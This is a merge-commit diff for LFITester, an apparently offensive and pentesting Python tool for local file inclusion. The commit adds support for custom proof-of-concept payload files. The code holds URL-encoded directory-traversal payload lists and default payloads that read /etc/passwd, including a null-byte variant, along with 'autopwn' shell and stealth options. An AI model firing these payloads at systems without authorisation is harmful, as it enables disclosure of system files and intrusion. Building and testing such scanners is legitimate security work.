Merge pull request #10 from Konstantinos-Papanagnou/main

#7 Added custom POC support

ArgumentHandler.py

@@ -2,7 +2,10 @@
 from bannermagic import printBannerPadding, printMessage
 from argparse import RawDescriptionHelpFormatter
 import pathlib
-import git
+try:
+ import git
+except ImportError:
+ print("There were issues importing git. Auto-update might fail...")
 import os
 from termcolor import colored
 
@@ -28,6 +31,15 @@ def __init__(self):
  self.url = lines
  else:
  self.url = None
+
+ self.override_poc = False
+ self.poc = None
+ if args.poc:
+ lines = []
+ for line in args.poc:
+ lines.append(line.strip())
+ self.poc = lines
+ self.override_poc = True
 
  self.crawler = args.crawler
  self.enable_proxies = args.enabled_proxies
@@ -152,6 +164,7 @@ def ConfigureParser(self):
  parser.add_argument('--update', dest='update', help="Update LFITester", action='store_true')
  parser.add_argument('--batch-ans', dest='batch', help="Answer all yes/no", type=str)
  parser.add_argument('-s', '--stealth', dest='stealth', help='Enable stealth mode', action='store_true')
+ parser.add_argument('--poc-file', dest='poc', help="Your custom poc file.", type=argparse.FileType('r'))
  return parser
 
 

LFITester.py

@@ -34,26 +34,29 @@ def main():
  proxyThread.join()
  print(colored("This script doesn't check for Remote File Inclusion (RFI)", 'blue'))
  print(colored("If it doesn't show any results that means it didn't find anything!!!", 'blue'))
+ poc = arghandler.poc
+ if arghandler.poc == None:
+ poc = ["%2Fetc%2Fpasswd", "%2Fetc%2Fpasswd%00"]
  if type(arghandler.url) is not list:
  if arghandler.crawler:
  test_urls = webcrawler(arghandler.url, check, arghandler.creds)
  for url in test_urls:
  print(colored(f"Testing: {url}\n\n", 'green'))
- PayloadManager.Payload(url, arghandler.outfile, arghandler.creds, verbosity=arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth)
+ PayloadManager.Payload(url, arghandler.outfile, arghandler.creds, verbosity=arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth, poc=poc, override_poc=arghandler.override_poc)
  else:
  print(colored(f"Testing: {arghandler.url}\n\n", 'green'))
- PayloadManager.Payload(arghandler.url, arghandler.outfile, arghandler.creds, verbosity=arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth)
+ PayloadManager.Payload(arghandler.url, arghandler.outfile, arghandler.creds, verbosity=arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth, poc=poc, override_poc=arghandler.override_poc)
  else:
  if arghandler.crawler:
  for url in arghandler.url:
  test_urls = webcrawler(url, check, arghandler.creds)
  for endpoint in test_urls:
  print(colored(f"Testing: {endpoint}\n\n", 'green'))
- PayloadManager.Payload(endpoint, arghandler.outfile, arghandler.creds, verbosity = arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth)
+ PayloadManager.Payload(endpoint, arghandler.outfile, arghandler.creds, verbosity = arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth, poc=poc, override_poc=arghandler.override_poc)
  else:
  for url in arghandler.url:
  print(colored(f"Testing: {url}\n\n", 'green'))
- PayloadManager.Payload(url, arghandler.outfile, arghandler.creds, verbosity = arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth)
+ PayloadManager.Payload(url, arghandler.outfile, arghandler.creds, verbosity = arghandler.verbosity, attempt_shell=arghandler.autopwn, mode=arghandler.mode, force=arghandler.force, batch=arghandler.batch, stealth=arghandler.stealth, poc=poc, override_poc=arghandler.override_poc)
  except KeyboardInterrupt:
  print('\nGracefully Exiting...\n')
  os._exit(0)

PayloadManager.py

@@ -18,7 +18,7 @@
 
 class Payload:
 
- def __init__(self, url, outfile, creds, initiate=True, poc=["%2Fetc%2Fpasswd", "%2Fetc%2Fpasswd%00"], verbosity=1, proxies=False, crawler=False, attempt_shell=False, mode=0, force=False, batch=None, stealth=False):
+ def __init__(self, url, outfile, creds, initiate=True, poc=["%2Fetc%2Fpasswd", "%2Fetc%2Fpasswd%00"], override_poc=False, verbosity=1, proxies=False, crawler=False, attempt_shell=False, mode=0, force=False, batch=None, stealth=False):
  requests.packages.urllib3.disable_warnings() # Comment out to stop suppressing warnings.
  self.url = url.strip()
  self.verbosity = verbosity
@@ -30,6 +30,7 @@ def __init__(self, url, outfile, creds, initiate=True, poc=["%2Fetc%2Fpasswd", "
  self.linux_dirTraversal = ["%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E", "%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E", "%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F", "%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F", "%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E", "%2F%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E%2F%2E%2F%2E%2E"]
  # poc -> Proof Of Concept (Change it if you want)
  self.poc = poc
+ self.override_poc = override_poc
 
  # Filter
  # The quote method automatically url encodes the string except for the "."
@@ -221,9 +222,12 @@ def stripHtmlTags(self, tag):
 
  # Checks for directory traversal
  def dirTraversalCheck(self):
- for i in self.linux_dirTraversal:
- for n in self.poc:
- compUrl = self.url + i + n
+ for traversal in self.linux_dirTraversal:
+ for poc in self.poc:
+ if not self.override_poc:
+ compUrl = self.url + traversal + poc
+ else:
+ compUrl = self.url + poc
  if self.verbosity > 1:
  print(colored('[*]', 'yellow', attrs=['bold']) + f' Testing: {compUrl}')
  clean = self.hit(compUrl)